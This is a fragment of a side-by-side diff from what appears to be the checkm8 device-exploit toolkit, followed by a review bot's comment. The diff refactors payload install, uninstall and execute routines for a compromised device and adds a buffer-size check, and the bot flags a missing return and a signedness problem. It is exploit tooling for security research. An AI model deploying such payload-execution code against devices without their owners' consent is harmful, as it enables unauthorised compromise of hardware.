case PAYLOAD_TASK_SLEEP_TEST:
pl = payload_task_sleep_test;
len = PAYLOAD_TASK_SLEEP_TEST_SZ;
break;
default: default:
return NULL; return NULL;
} }
@@ -94,8 +80,8 @@ void free_payload(struct payload *p)
DEV_PTR_T get_address(struct pwned_device *dev, LOCATION_T l, int len) DEV_PTR_T get_address(struct pwned_device *dev, LOCATION_T l, int len)
{ {
checkm8_debug_indent("get_address(dev = %p, loc = %i, len = %i)\n", dev, l, len); checkm8_debug_indent("get_address(dev = %p, loc = %i, len = %i)\n", dev, l, len);
DEV_PTR_T addr_malloc = 0x10000efe0, retval; DEV_PTR_T retval;
unsigned long long malloc_args[2] = {addr_malloc, (unsigned long long) len}; unsigned long long malloc_args[2] = {ADDR_DEV_MALLOC, (unsigned long long) len};
struct dev_cmd_resp *resp = dev_exec(dev, 0, 2, malloc_args); struct dev_cmd_resp *resp = dev_exec(dev, 0, 2, malloc_args);
if(IS_CHECKM8_FAIL(resp->ret)) if(IS_CHECKM8_FAIL(resp->ret))
@@ -192,7 +178,6 @@ int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc)
int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p) int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p)
{ {
checkm8_debug_indent("uninstall payload(dev = %p, p = %i)\n", dev, p); checkm8_debug_indent("uninstall payload(dev = %p, p = %i)\n", dev, p);
DEV_PTR_T addr_free = 0x10000f1b0;
unsigned long long free_args[2]; unsigned long long free_args[2];
struct dev_cmd_resp *resp; struct dev_cmd_resp *resp;
struct payload *pl = dev_retrieve_payload(dev, p); struct payload *pl = dev_retrieve_payload(dev, p);
@@ -203,7 +188,7 @@ int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p)
return CHECKM8_FAIL_INVARGS; return CHECKM8_FAIL_INVARGS;
} }
free_args[0] = addr_free; free_args[0] = ADDR_DEV_FREE;
free_args[1] = pl->install_base; free_args[1] = pl->install_base;
resp = dev_exec(dev, 0, 2, free_args); resp = dev_exec(dev, 0, 2, free_args);
@@ -261,8 +246,7 @@ int uninstall_data(struct pwned_device *dev, DEV_PTR_T addr)
{ {
checkm8_debug_indent("uninstall_data(dev = %p, addr = %X)\n", dev, addr); checkm8_debug_indent("uninstall_data(dev = %p, addr = %X)\n", dev, addr);
struct dev_cmd_resp *resp; struct dev_cmd_resp *resp;
DEV_PTR_T addr_free = 0x10000f1b0; unsigned long long free_args[2] = {ADDR_DEV_FREE, addr};
unsigned long long free_args[2] = {addr_free, addr};
resp = dev_exec(dev, 0, 2, free_args); resp = dev_exec(dev, 0, 2, free_args);
if(IS_CHECKM8_FAIL(resp->ret)) if(IS_CHECKM8_FAIL(resp->ret))
@@ -319,6 +303,14 @@ unsigned long long execute_payload_async(struct pwned_device *dev, PAYLOAD_T p,
checkm8_debug_indent("\tpayload is not installed\n"); checkm8_debug_indent("\tpayload is not installed\n");
return DEV_PTR_NULL; return DEV_PTR_NULL;
} }
if(bufsize < nargs * sizeof(unsigned long long))
{
checkm8_debug_indent("\texpanding buffer to fit (at least) provided arguments\n");
bufsize = nargs * sizeof(unsigned long long);
}
} }
struct dev_cmd_resp *read_gadget(struct pwned_device *dev, DEV_PTR_T addr, int len) struct dev_cmd_resp *read_gadget(struct pwned_device *dev, DEV_PTR_T addr, int len)
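Review bot: In `execute_payload_async` the added `bufsize` adjustment is, as rendered in the last hunk, the final statement before the function's closing brace, so the enlarged value is never used and a function declared to return `unsigned long long` falls off the end without a `return`; a caller that reads the result gets undefined behaviour. The comparison `bufsize < nargs * sizeof(unsigned long long)` is carried out in `size_t`, so if `bufsize` or `nargs` is a signed type (their declarations are outside the hunk) a negative value converts to a very large one and the check misjudges it. Reject negative values first, e.g. `if(nargs < 0 || bufsize < 0) return DEV_PTR_NULL;`, and end the function with an explicit return. The function starts outside the hunk.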

Binary file not shown.

Binary file not shown.